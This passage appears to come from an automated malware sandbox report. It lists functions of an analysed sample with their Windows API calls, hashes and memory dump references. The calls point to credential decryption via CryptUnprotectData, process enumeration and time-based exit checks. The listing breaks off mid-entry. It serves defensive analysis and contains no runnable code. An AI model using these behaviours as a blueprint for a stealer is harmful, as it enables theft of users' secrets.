                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 562dbca1de5f906c4eefa7daf0b4e5457259797662369a8e655da11ea07cbc42
                    • Instruction ID: 4406d16ce6d013763b2dcb84bd2484df948d9bb13c8a25418a1df76e85ca596f
                    • Opcode Fuzzy Hash: 562dbca1de5f906c4eefa7daf0b4e5457259797662369a8e655da11ea07cbc42
                    • Instruction Fuzzy Hash: 2C4171F5D04219DFDB10DFE4CD89BEEB7B9BB48304F1042A9E609A6280D7745A84CF96
                    Function 00486920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 0048696C
                    • sscanf.NTDLL ref: 00486999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004869B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004869C0
                    • ExitProcess.KERNEL32 ref: 004869DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: d0acc49ea327c8f3bb93e8f1d72d7c8e07bae1b65edddd9322fba2035d2c5f8a
                    • Instruction ID: eddc1433ef7a3f56e174c34823eb496ab8357cb2a9f1a000371ea277f7076795
                    • Opcode Fuzzy Hash: d0acc49ea327c8f3bb93e8f1d72d7c8e07bae1b65edddd9322fba2035d2c5f8a
                    • Instruction Fuzzy Hash: 7A21EEB5D14208ABCF44EFE4D9459EEB7B6FF48300F04856EE406E3250EB745645CB69
                    Function 00477240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0047724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00477254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00477281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004772A4
                    • LocalFree.KERNEL32(?), ref: 004772AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: 244b02b720ca9f54d762347ea7d0817bc4501b35f77656e5083415348f325326
                    • Instruction ID: 125770a6a37d659a905d2a8a248da9bf32e15df793873a50f489baa627936847
                    • Opcode Fuzzy Hash: 244b02b720ca9f54d762347ea7d0817bc4501b35f77656e5083415348f325326
                    • Instruction Fuzzy Hash: 6C0112B5A40208BBEB10DFD4CD45F9E7779EB44700F108155FB09AB2C0D674AA418B69
                    Function 00489600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0048961E
                    • Process32First.KERNEL32(00490ACA,00000128), ref: 00489632
                    • Process32Next.KERNEL32(00490ACA,00000128), ref: 00489647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0048965C
                    • CloseHandle.KERNEL32(00490ACA), ref: 0048967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: d59316a50639213f8f546f4f3ff45a608908a1b7470f9bdffc9c2f3ec8db4ab0
                    • Instruction ID: b5645760c68264e1900152c61d95bbdd51f3d2b660eaccbc5566d5dd205ba0bf
                    • Opcode Fuzzy Hash: d59316a50639213f8f546f4f3ff45a608908a1b7470f9bdffc9c2f3ec8db4ab0
                    • Instruction Fuzzy Hash: F2010CB5A00208ABCB14DFA5DD58BEEB7F9EB48300F144699A905A6240EB349F81DF51
                    Function 00834AB7 Relevance: 6.6, Strings: 4, Instructions: 1601COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: \>$8@;a$qs$-cV
                    • API String ID: 0-2433157952
                    • Opcode ID: 4932d14879632d8a8747b626a5f71761e26e59d688e1cc8fc05f411a3906afef
                    • Instruction ID: 1807e3a8f7c7a9656580adb24076ba4b3f4af4f1fbbd73724f7b8f1b39445080
                    • Opcode Fuzzy Hash: 4932d14879632d8a8747b626a5f71761e26e59d688e1cc8fc05f411a3906afef
                    • Instruction Fuzzy Hash: B6B2D4F3A0C204AFE3146E29EC8567AFBE9EFD4720F16893DE6C4C3744E63558058696
                    Function 00839B55 Relevance: 6.6, Strings: 4, Instructions: 1599COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: '\y$A/wM$W"[_$\ ]S
                    • API String ID: 0-1311202765
                    • Opcode ID: a8ba1e9cc21f18855daace36590d6c20a3b1629758bdd93e206eef52d2cf7521
                    • Instruction ID: ebd6179d80686a007cdb058bebe3f9b5c6961e459c0a6d9f3a160bd0b5ecba22
                    • Opcode Fuzzy Hash: a8ba1e9cc21f18855daace36590d6c20a3b1629758bdd93e206eef52d2cf7521
                    • Instruction Fuzzy Hash: B3B2E7F360C2009FE704AE2DEC8566AFBEAEFD4720F16893DE6C4C7744E63558058696
                    Function 0084566A Relevance: 6.6, Strings: 4, Instructions: 1592COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ^V>+$~qV$j=$w7?
                    • API String ID: 0-3978660184
                    • Opcode ID: dfcbbc4472744708843cdddca7b1cce58291b42fa1770613fab77bc92be90dc4
                    • Instruction ID: 3024a4ff8b15c3625b9dfd2a447330ff63a6edefd76d9c03c1744d37f2a26c2a
                    • Opcode Fuzzy Hash: dfcbbc4472744708843cdddca7b1cce58291b42fa1770613fab77bc92be90dc4
                    • Instruction Fuzzy Hash: 94B227F360C2049FE708AE2DEC8567ABBE5EF94320F16893DE6C5C7744EA3558048697
                    Function 00488EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00475184,40000001,00000000,00000000,?,00475184), ref: 00488EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: f295be6167c6aa2ddad929f34612efa6ac73c827f69b7a578ce4b54db13ccd20
                    • Instruction ID: 435e05716119e9302b44a18fb252e8e54d80e73f164d59b7a9bb955f22a83da2
                    • Opcode Fuzzy Hash: f295be6167c6aa2ddad929f34612efa6ac73c827f69b7a578ce4b54db13ccd20
                    • Instruction Fuzzy Hash: EB111FB0200204BFDB00DFA4D884FBB33AAAF89304F509949FA158B250DB39EC81DB65
                    Function 00487A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0123E028,00000000,?,00490E10,00000000,?,00000000,00000000), ref: 00487A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0123E028,00000000,?,00490E10,00000000,?,00000000,00000000,?), ref: 00487A7D
                    • wsprintfA.USER32 ref: 00487AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: c5d548b3ca59dee6ef332bd1ba82ba065e1ec2f1aafa041fe1a2b85f50878ce9
                    • Instruction ID: 1ed44dfdbc00fe110136d4ac6257bcccb391fce8079596815fd1f1bed42ebf2b
                    • Opcode Fuzzy Hash: c5d548b3ca59dee6ef332bd1ba82ba065e1ec2f1aafa041fe1a2b85f50878ce9
                    • Instruction Fuzzy Hash: 6F1182B1D45218EBDB109B54DC45F69B778FB04711F10479AE51A932C0D7785A40CF55
                    Function 00848C69 Relevance: 5.4, Strings: 3, Instructions: 1633COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #Q}3$.8?$5|
                    • API String ID: 0-3686594883
                    • Opcode ID: 08b3badc2ebbf2de4ca0ae1d1033e1cf81c64a78f9a1f56a6afb0df27af2c4d2
                    • Instruction ID: d5e0a7af8fbc90a57b2a9f0638cc84702d8cee00be13688c1befcbefc272f6fd
                    • Opcode Fuzzy Hash: 08b3badc2ebbf2de4ca0ae1d1033e1cf81c64a78f9a1f56a6afb0df27af2c4d2
                    • Instruction Fuzzy Hash: 10B228F360C2049FE304AE2DEC8567AF7D9EF94320F1A463DEAC5C7744EA3598058696
                    Function 0083CFC3 Relevance: 5.3, Strings: 3, Instructions: 1544COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 3_w$'lt$n+7{
                    • API String ID: 0-1479877609
                    • Opcode ID: 86c0617a2f033c783604320c57828f05cf7116b95526fcfcda4d5679b473af51
                    • Instruction ID: fa797d8ce00741a463cda908027a118804162bb4d3727e48c31e3de1d6a6d846
                    • Opcode Fuzzy Hash: 86c0617a2f033c783604320c57828f05cf7116b95526fcfcda4d5679b473af51
                    • Instruction Fuzzy Hash: 22B2F7F390C2149FE304AE29EC8566AFBE5EF94720F1A493DEAC4C3744E67598058793
                    Function 0083337B Relevance: 5.1, Strings: 3, Instructions: 1331COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .Mn?$@p_o$X](w
                    • API String ID: 0-2197809461
                    • Opcode ID: 85c48d064934271844a186d6408af96387bf5c1bd1efe37b816ec7e8b8674288
                    • Instruction ID: 68b60b7e56606e257a53bcf411badcf76b5c9ea694ef982f54bf4e2d00a9fc09
                    • Opcode Fuzzy Hash: 85c48d064934271844a186d6408af96387bf5c1bd1efe37b816ec7e8b8674288
                    • Instruction Fuzzy Hash: BC9205F360C204AFE3046E29EC85B7ABBE9EFD4720F16863DE6C483744E63558158697
                    Function 00836992 Relevance: 5.1, Strings: 3, Instructions: 1323COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
